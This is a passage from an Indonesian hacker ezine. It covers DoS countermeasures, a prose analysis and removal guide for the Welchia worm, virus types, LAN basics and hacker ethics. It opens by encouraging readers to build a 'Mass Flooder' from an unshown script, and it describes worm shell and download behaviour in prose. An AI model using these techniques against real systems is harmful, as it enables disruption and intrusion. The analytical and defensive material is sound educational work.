Skrip sederhana diatas hanya melakukan hubungan dengan server korban,
lalu mengirimkan flood dan melakukan post testing. Dengan sedikit
pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force
Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana
mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau
bagaimana mudahnya melakukan input flooding dan membuat tool sendiri.
Namun Denial of service adalah masalah layanan publik.Sama halnya dengan
anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai
sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option
untuk menolak cracker untuk mengakses system.

2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal.
Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet'
dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak -
tidak tertutup kemungkinan untuk melakukan Denial of Service -.
Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung
dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
atau melakukan up-date.

3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan
identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui
firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ).
Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang
admin harus teliti.
Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi
jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'.
Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif
juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman,
atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa
menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan
dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
admin dan user bersangkutan.

referensi:

[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
Elexmedia Komputindo, ISBN: 979-20-3249-5
[2] 7 Cara Isengi Apache dan kiat mengatasinya.
Steven Haryanto, Masterweb Magazine Oktober 2001
[3] Introduction to Denial of Service
Hans Husman, t95hhu@student.tdb.uu.se
[4] CERT ADVISORIES.
www.cert.org
[5] Packet Storm Security
http://packetstormsecurity.nl
[6] BugTraq
www.securityfocus.com

*ezine

W32.Welchia.Worm

W32.Welchia.Worm adalah worm yang mampu mengeksplotasi berbagai kebocoran
(vulnerabilities), termasuk diantaranya:
- DCOM RPC vulnerability ..
(sebagimana di jelaskan dalam buletin keamanan Microsoft MS03-026)
yang menggunakan tcp port 135,menyerang secara spesifik kepada Windows XP
- Webdav vulnerability (sebagimana di jelaskan dalam buletin keamanan
Microsoft MS03-007) yang menggunakan tcp port 80., menyerang Mesin yang
menjalankan IIS 5.0, dan akan berdampak padawindows 2000 system,dan NT/XP.

dikenal juga dengan nama:
W32/Welchia.worm10240 [AhnLab], W32/Nachi.worm [McAfee],
WORM_MSBLAST.D [Trend], Lovsan.D [F-Secure],W32/Nachi-A [Sophos],
Win32.Nachi.A [CA], Worm.Win32.Welchia [KAV]

Tipe: Worm
Panjang infeksi : 10,240 bytes
Systems yang dapat di infeksi:Microsoft IIS, Windows 2000, Windows XP
Systems yang tidak terinfeksi:Linux, Macintosh, OS/2, UNIX, Windows 3.x,
Windows 95, Windows 98, Windows Me, Windows NT

Port yang digunakan: TCP 135(RPC DCOM), TCP 80(WebDav)

saat W32.Welchia.Worm di eksekusi, maka akan melakukan:

mengkopikan dirinya ke:

%System%\Wins\Dllhost.exe

catatan %Sytem% adalah variabel, worm akan mencari folder file system dan
mengkopikan dirinya,secara default adalah C:\Winnt\System32 (Windows 2000)
atau

C:\Windows\System32 (Windows XP).membuat kopi file
%System%\Dllcache\Tftpd.exe sebagai %System%\Wins\svchost.exe.

catatan :
Tftpd adalah program yang diijinkan, sehingga sulit untuk dideteksi oleh antivirus.

menambah subkeys:

RpcPatch

dan:

RpcTftpd

ke registry key di:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Membuat beberapa services:

Nama Service : RpcTftpd
Service Display Name: Network Connections Sharing
Service Binary: %System%\wins\svchost.exe
Service ini akan diset untuk berjalan secara manual.

Nama Service : RpcPatch
Service Display Name: WINS Client
Service Binary: %System%\wins\dllhost.exe

Service ini akan di set untuk dapat berjalan secara otomatis.
Proses terakhir adalah menghapus file %System%\msblast.exe sebagai tempat
pertama kali W32.Blaster.Worm


worm ini melakukan:
- mengirimkan packet ICMP /ping , untuk mengecek apakah komputer dengan ip tersebut aktif di jaringan.
- Setelah worm berhasil mengetahui bahwa mesin tersebut aktif di jaringan maka akan mengirimkan data ke port tcp 135 dan akan mengeksploitasi kelemahan DCOM RPC atau, akan mengirim date ke port tcp 80 untuk mengeksploitasi kelemahan Webdav
- membuat shell untuk remote pada mesin yang telah di ekspoitasi kelemahannya dan akan mencoba terhubung ke mesin penyerang dengan menggunakan prot tcp secara acak, antara 666 dan 765 untuk menerima instruksi.
- Menjalankan server TFTP pada mesin penyerang dan menginstruksikan mesin yang tereksploitasi (korban) untuk terhubung dan mendownload Dllhost.exe dan svchost.exe dari mesin penyerang. jika file %System%\dllcache\tftpd.exe ada, maka worm tidak akan mendownload svchost.exe.
- memeriksa versi Sistem operasi komputer tersebut, Nomor Service pack dan juga menghalangi untuk terhubung ke Microsoft's Windows Update dan mencegah komputer untuk DCOM RPC vulnerability patch.

Untuk memusnahkan worm ini dapat dilakukan beberapa cara:
* Gunakan peralatan removal W32.Welchia.WOrm
* Menghapus secara manual:
1 menDisable System Restore (Windows XP).
mengapa? XP kuhusnya secara default mengenable system restore,
mengapa berbahaya? karena virus, worm atau trojan yang menginfeksi
komputer anda mungkin saja di backup juga oleh system restore dan yang
membuat lebih berbahaya adalah windows melindungi program lain,termasuk
antivirus untuk memodifikasi (menquarantine, menghapus dan membersihkan)
sytem restore=system restore bisa jadi tempat teraman bagi virus dkk.
karena itu anda wajib men-disablekan system restore anda

untuk mematikan system restore:
- anda harus sebagaoi administrator (xp)
- masuk ke control panel
- pilih system, di system properties pilih System restore
- centang turn off system restore


2 Update virus definition dari antivirus yang digunakan. anda hanya perlu
mengunjungi situs antivirus anda, atau menjalankan Live Update langsung
dari program antivirus anda untuk melaukan update.

3 Restart komputer anda dalam save mode untuk menghentikan Worm.
untuk windows 95/98/me anda bisa masuk ke save mode setelah restart
sedangkan,
untuk xp/nt/win 2000
anda dapat menghentikan kerja virus buat sementara dengan cara:
-masuk control panel
-pilih services pada administrative tools
-scroll kebawah sampai anda temukan
+ Network Connections Sharing
+ WINS Client
-klik-kanan dan pilih stop

4 jalankan full system scan dan delete semua file yang dideteksi sebagai
W32.Welchia.Worm.jalankan full scan dan konfigurasi terlebih dahulu
antivirus anda jika ditemukan ada file yang terinfeksi W32.Welchia.Worm
maka hapus file tersebut

5 Delete values& subkeys yang dibuat oleh virus di registry.
hal ini sedikit beresiko, sebelum anda lakukan, backup dulu registry anda

-klik start -run dan ketik regedit
masuk ke key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

hapus subkey berikut:

RpcPatch

dan

RpcTftpd
simpan perubahan dan keluar dari registry

6 Delete Svchost.exe file.
masuk ke folder %system%wins dan hapus semua file svchost.exe

*ezine

Pernak - Pernik Tentang Virus

pengantar
=========

Apakah Kalian pernah mendengar apa itu virus, tahukah kalian apa yang
dimaksud virus itu disini aku akan coba mengartikan apa itu virus.
virus yang lebih dikenal dalam istilah kedokteran atau arti virus sebagai
biological virusses" inipun ternyata populer juga di dunia yang terdiri dari
elektron ini. hal ini terjadi dikarenakan kemiripan dalam mekanisme
penyebarannya.

Virus komputer bisa diartikan secara gamblang adalah suatu program komputer
biasa. tetapi memiliki perbedaan yang mendasar dengan program-program
lainnya,yaitu dia dibuat untuk menulari program program lainnya, mengubah,
memanipulasinya bahkan sampai merusaknya.

tetapi ada yang perlu dicatat disini, virus hanya akan menulari apabila
program pemicu atau program yang telah terinfeksi tadi dieksekusi,
disinilah perbedaannya dengan "worm". Aku tidak akan mencoba membahas worm
karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

asal muasal virus
=================

1949, John Von Neuman, menggungkapkan "teori self altering automata"
yang merupakan hasil riset dari para ahli matematika.
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang
diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut
untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang
dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.
Program yang mampu bertahan dan menghancurkan semua program lain, maka akan
dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan
favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai
mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin
berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yangketat.
1980, program tersebut yang akhirnya dikenal dengan "virus" ini berhasil
menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.
1980, mulailah dikenal virus virus yang menyebar di dunia cyber.

Jenis-Jenis Virus
=================

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
memberikan penjelasan tentang jenis jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
=============
Aku rasa kita semua sudah sangat sering mendengar tentang virus ini. Virus ini
ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada komputer
mac dapat menjalankan aplikasi word maka virus ini bekerja pada komputer
bersistem operasi Mac.
contoh virus:
-variant W97M, misal W97M.Panther panjang 1234 bytes,akanmenginfeksi NORMAL.DOT
dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW :: 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan
bahasa makro, biasanya berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
===================
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering
diformat gara gara virus ini :P, tapi karena itu aku sobatan ma dia, :)).
Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot
sector asli dengan program booting virus. Sehingga saat terjadi booting maka
virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan
mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini
pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer
(ex: floopy, drive lain selain c:\)
contoh virus ::
-varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan
floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
-varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy;
panjang 520 bytes; karakteristik: menetap di memori (memory resident),
terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" stelah komputer
melakukan booting sebanyak 128 kali)

3.Stealth Virus
===============
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendaikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes;
karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy dan motherboot record; panjang
520 bytes;menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s): menginfeksi file file *.EXE, *.SYS, dan *.COM ; panjang fie 3275
bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
===================
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.
contoh virus:
-Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
apat berubah ubah struktur
-Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik :
menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi
dan dapat berubah ubah struktur
-dll

5.Virus File/Program
====================
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari
virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus
=======================
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinyapekerjaan
yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file file *.EXE dan juga
menginfeksi Boot Sector.


Kriteria Virus
==============
Suatu virus , dapat dikatakan adalah benar benar virus apabila minimal memiliki 5
kriteria (kriteria ini aku dapatkan dari sebuah sumber terpercaya :))
1.kemampuan suatu virus untuk mendapatkan informasi
2.kemampuannya untuk memeriksa suatu program
3.kemampuannya untuk menggandakan diri dan menularkan
4.kemampuannya melakukan manipulasi
5.kemampuannya untuk menyembunyikan diri.


Sekarang akan aKu coba jelaskan dengan singkat apa yang dimaksud dengan tiap-tiap
kemampuan itu dan mengapa ini sangat diperlukan.

Kemampuan untuk mendapatkan informasi
=====================================
Pada umumnya suatu virus memerlukan daftar nama nama file yang ada dalam suatu
directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan
dia tulari, semisal virus makro yang akan menginfeksi semua file berekstensi *.doc
setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu
diperlukan agar virus dapat membuat daftar/dat semua file terus memilah dengan
mencari file file yang bisa ditulari. Biasanya data ini tercipta saat program yang
tertular atau terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan
segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) ,
sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap
program bervirus dijalankan biasanya dibuat hidden oleh virus (agar gak keliatan).

Kemampuan memeriksa suat program
================================
Suatu virus juga sangat amat harus (berlebihan gak ya :P) bisauntuk memeriksa suatu
program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc,
dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,karena
jika sudah maka dia akan percuma menularinya 2 kali (virus aja perhitungan coba,:)).
Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki / memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut.Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.

Kemampuan untuk menggandakan diri
=================================
Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. inti dari
virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu
virus apabila telah menemukan calon korbannya (baik file atau program) maka
ia akan mengenalinya dengan memeriksanya,jika belum terinfeksi maka sang virus akan
memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/
file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatasfile/program
yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/
menggandakan dirinya adalah:

a.File/Program yanga akan ditulari dihapus atau diubah namanya. kemudian diciptakan
suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus
mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file
file lain dengancara menumpangi seluruh file/program yang ada.

Kemampuan mengadakan manipulasi
===============================
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunain buat memanipulasi program ataupun mempopulerkan pembuatnya! (:P) Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi.
misal:
a.Membuat gambar atau pesan pada monitor
b.mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pc
c.memanipulasi program/file yang ditulari
d.merusak program/file
e.Mengacaukan kerja printer , dsb

Kemampuan Menyembunyikan diri
=============================
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terjlaksana.
langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll

*ezine

Pengenalan Jaringan LAN

Pengertian dan Prinsip Kerja LAN
================================

LAN dapat definisikan sebagai network atau jaringan sejumlah sistem
komputer yang lokasinya terbatas didalam satu gedung, satu kompleksgedung
atau suatu kampus dan tidak menggunakan media fasilitas komunikasi umum
seperti telepon, melainkan pemilik dan pengelola media komunikasinya
adalah pemilik LAN itu sendiri.
Dari definisi diatas dapat kita ketahui bahwa sebuah LAN dibatasi oleh
lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkansemua
komputer yang terhubung dalam jaringan dapat bertukar data atau dengan
kata lain berhubungan. Kerjasama ini semakin berkembang dari hanya
pertukaran data hingga penggunaan peralatan secara bersama.
LAN yang umumnya menggunakan hub, akan mengikuti prinsip kerja hub itu
sendiri. Dalam hal ini adalah bahwa hub tidak memiliki pengetahuantentang
alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena
hub hanya memiliki satu domain collision sehingga bila salah satu port
sibuk maka port-port yang lain harus menunggu.

Komponen-komponen Dasar LAN
===========================

Beberapa komponen dasar yang biasanya membentuk suatu LAN adalah sebagai
berikut:

•Workstation
============
Workstation merupakan node atau host yang berupa suatu sistem komputer.
Sistem komputer ini dapat berupa PC atau dapat pula berupa suatu komputer
yang besar seperti sistem minicomputer, bahkan suatu mainframe.
Workstation dapat bekerja sendiri (stand-alone) dapat pula menggunakan
jaringan untuk bertukar data dengan workstation atau user yang lain.
•Server
=======
Perangkat keras (hardware) yang berfungsi untuk melayani jaringan dan
workstation yang terhubung pada jaringan tersebut.pada umumnya sumber
daya (resources) seperti printer, disk, dan sebagainya yang hendak
digunakan secara bersama oleh para pemakai di workstation berada dan
bekerja pada server. Berdasarkan jenis pelayanannya dikenal disk server,
file server, print server, dan suatu server juga dapat mempunyai beberapa
fungsi pelayanan sekaligus.

•Link (hubungan)
================
Workstation dan server tidak dapat berfungsi apabila peralatan tersebut
secara fisik tidak terhubung. Hubungan tersebut dalam LAN dikenal sebagai
media transmisi yang umumnya berupa kabel. Adapun beberapa contoh dari
link adalah:
1.Kabel Twisted Pair
•Kabel ini terbagi dua, yaitu Shielded Twisted Pair dan Unshielded Twisted
Pair(UTP)
•Lebih banyak dikenal karena merupakan kabel telpon
•Relatif murah
•Jarak yang pendek
•Mudah terpengaruh oleh gangguan
•Kecepatan data yang dapat didukung terbatas, 10-16 Mbps

2.Kabel Coaxial
•Umumnya digunakan pada televisi
•Jarak yang relatif lebih jauh
•Kecepatan pengiriman data lebih tinggi di banding Twisted Pair, 30 Mbps
•Harga yang relatif tidak mahal
•Ukurannya lebih besar dari Twisted Pair

3.Kabel Fiber Optic
•Jarak yang jauh
•Kecepatan data yang tinggi, 100 Mbps
•Ukuran yang relatif kecil
•Sulit dipengaruhi gangguan
•Harga yang relatif masih mahal
•Instalasi yang relatif sulit


•Network Interface Card (NIC)
=============================
Suatu workstation tidak dihubungkan secara langsung dengan kabel jaringan
ataupun tranceiver cable, tetapi melalui suatu rangkaian elektronika yang
dirancang khusus untuk menangani network protocol yang dikenal dengan
Network Interface Card (NIC).

•Network Software
==================
Tanpa adanya software jaringan maka jaringan tersebut tidak akan bekerja
sebagaimana yang dikehendaki. Software ini juga yang memungkinkan sistem
komputer yang satu berkomunikasi dengan sistem komputer yang lain.

Peralatan Pendukung LAN
=======================

a.Repeater
•Pada OSI, bekerja pada lapisan Physical
•Meneruskan dan memperkuat sinyal
•Banyak digunakan pada topologi Bus
•Penggunaannya mudah dan Harga yang relatif murah
•Tidak memiliki pengetahuan tentang alamat tujuan sehingga penyampaian
data secara broadcast
•Hanya memiliki satu domain collision sehingga bila salah satu port sibuk
maka port-port yang lain harus menunggu.
b.Hub
•Bekerja pada lapisan Physical
•Meneruskan sinyal
•Tidak memiliki pengetahuan tentang alamat tujuan
•Penggunaannya relatif mudah dan harga yang terjangkau
•Hanya memiliki satu buah domain collision
c.Bridge
•Bekerja di lapisan Data Link
•Telah menggunakan alamat-alamat untuk meneruskan data ke tujuannya
•Secara otomatis membuat tabel penterjemah untuk diterima masing2 port
d.Switch
•Bekerja di lapisan Data Link
•Setiap port didalam swith memiliki domain collision sendiri-sendiri
•Memiliki tabel penterjemah pusat yang memiliki daftar penterjemah untuk
semua port
•Memungkinkan transmisi secara full duflex (dua arah)
e.Router
•Router berfungsi menyaring atau memfilter lalu lintas data
•Menentukan dan memilih jalur alternatif yang akan dilalui oleh data
•Menghubungkan antar jaringan LAN, bahkan dengan WAN

Topologi LAN
=============

Pengertian topologi Jaringan adalah susunan lintasan aliran data didalam
jaringan yang secara fisik menghubungkan simpul yang satu dengan simpul
lainnya. Berikut ini adalah beberapa topologi jaringan yang ada dan
dipakai hingga saat ini, yaitu:
•Topologi Star
Beberapa simpul/node dihubungkan dengan simpul pusat/host, yang membentuk
jaringan fisik seperti bintang, semua komunikasi ditangani langsung dan
dikelola oleh host yang berupa mainframe komputer.

•Topologi Hierarkis
Berbentuk seperti pohon bercabang yang terdiri dari komputer induk(host)
dihubungkan dengan simpul/node lain secara berjenjang. Jenjang yang lebih
tinggi berfungsi sebagai pengatur kerja jenjang dibawahnya.

•Topologi Bus
Beberapa simpul/node dihubungkan dengan jalur data (bus). Masing2 node
dapat melakukan tugas-tugas dan operasi yangberbeda namun semua mempunyai
hierarki yang sama.

•Topologi Loop
Merupakan hubungan antar simpul/node secara serial dalam bentuk suatu
lingkaran tertutup. Dalam bentuk ini tak ada central node/host, semua
mempunyai hierarki yang sama.

•Topologi Ring
Bentuk ini merupakan gabungan bentuk topologi loop dan bus, jika salah
satu simpul/node rusak, maka tidak akan mempengaruhi komunikasi node
yang lain karena terpisah dari jalur data.

•Topologi Web
Merupakan bentuk topologi yang masing-masing simpul/node dalam jaringan
dapat saling berhubungan dengan node lainnya melalui beberapa link.
Suatu bentuk web network dengan n node, akan menggunakan link sebanyak
n(n-1)/2.

Dengan menggunakan segala kelebihan dan kekurangan masing2 konfigurasi,
memungkinkan dikembangkannya suatu konfigurasi baru yang menggabungkan
beberapa topologi disertai teknologi baru agar kondisi ideal suatu
sistem jaringan dapat terpenuhi.

*ezine

Etika Hacker

Etika-etika hacker
1.Kepercayaan bahwa berbagi informasi adalah suatu hal yang sangat baik dan
berguna, dan sudah merupakan kewajiban (kode etik) bagi seorang
hacker untuk membagi hasil penelitiannya dengan cara menulis kode yang
"open-source" dan memberikan fasilitas untuk mengakses informasi tersebut
dan menggunakan peralatan pendukung apabila memungkinkan.

2.keyakinan bahwa "system-cracking" untuk kesenangan dan eksplorasi sesuai
dengan etika adalah tidak apa-apa [OK] selama seorang hacker, cracker
tetap komitmen tidak mencuri, merusak dan m elanggar batas2 kerahasiaan.

"Yang menarik,ternyata dalam dunia hacker terjadi strata-strata (tingkatan)
yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya,
bukan karena umur atau senioritasnya. Saya yakin tidak semua orang setuju
dengan derajat yang akan dijelaskan disini,karena ada kesan aroganterutama
pada level yang tinggi. Untuk memperoleh pengakuan/derajat, seorang hacker
harus mampu membuat program untuk eksploit kelemahan sistem, menulis
tutorial (artikel), aktif diskusi di mailing list, membuat situs web dsb."

Hirarki Hacker

Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker;
saya yakin istilah ini tidak sepenuhnya bisa di terima oleh masyarakat
hacker. Oleh karenanya saya meminta maaf sebelumnya. Secara umum yang
paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin
lebih sering di sebut ‘suhu’.Sedangkan, di ujung lain derajat hackerdikenal‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

Elite :

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan
ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar
dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global.
Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat
alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan
tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui,
walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu
mengikuti peraturan yang ada.

Semi Elite:

Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan
& pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi
(termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecilprogram cukup
untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan
oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di
kategorikan Lamer.

Developed Kiddie:

Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah.
Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan.
Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan
kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface(GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan
baru di sistem operasi.

Script Kiddie:

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas.
Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking
yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan
menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna
Internet.

Lamer:

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi hacker
(wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker &
ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC,
tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan
hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri
melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite,
dalam perkembangannya mereka hanya akan sampai level developed kiddie atau
script kiddie saja.

Etika & Aturan main Hacker
==========================
+ Di atas segalanya, hormati pengetahuan & kebebasan informasi.
+ Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang
di keamanan yang anda lihat.
+ Jangan mengambil keuntungan yang tidak fair dari hack.
+ Tidak mendistribusikan & mengumpulkan software bajakan.
+ Tidak pernah mengambil resiko yang bodoh
+ selalu mengetahui kemampuan sendiri.
+ Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan&
mengajarkan berbagai informasi & metoda yang diperoleh.
+ Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
+ Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
+ Tidak pernah secara sengaja menghapus & merusak file di komputer yangdihack.
+ Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Jelas dari Etika & Aturan main Hacker di atas, terlihat jelas sangat tidak
mungkin seorang hacker betulan akan membuat kerusakan di komputer.
(diambil , dan diedit berdasarkan tulisan : Onno w. Purbo)

*ezine

Hacking

*RFC1392,Internet User Glossary, :
Hacker adalah:
Seseoang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system, komputer, atau jaringan komputer

hack [secara umum]
1.pekerjaan yang dilakukan secara cepat dan berhasil, walau tidak sempurna
2.Suatu hal Mustahil, dan mungkin menghabiskan banyak waktu tetapi
menghasilkan yang diinginkan.
3.untuk membuktikan baik secara emosional ataupun fisik bahwa ini bisa
dilakukan
4.Mengerjakan sesuatu secara bersungguh-sungguh, dengan ketelitian yang
tinggi
5.Berinteraksi dengan komputer dalam bermain dan bereksplorasi
6.kependekan dari hacker

hacker [aslinya, seseorang yang membuat kerajinan dengan kapak]
1.Seseorang yang sangat senang mengeksplorasi suatu program dari suatu
system untuk untuk mengetahui batas kemampuannya, dengan mengunakan cara-
cara dasar yang akan digunakan oleh orang yang tidak mengerti dan
mengetahui bagaimana program itu dibuat dan dengan pengetahuan minimum
terhadap program.
2.seseorang yang sangat antusias dalam membuat program, dan lebih menikmati
membuat program dibandingkan berteori tentang program tersebut.
3.seseorang yang mampu melakukan "hack"
4.seseorang yang sangat baik dalam memprogram
5.ahli pemrograman, atau sering melakukan pekerjaan dengan program itu
6.ahli yang tertarik dengan semua hal, contoh hacker di bidang astronomy.
7.seseeorang yang senang dengan tantangan intelektual dengan ide kreatif
8.seseorang yang secara sembunyi-sembunyi berusaha menemukan informasi
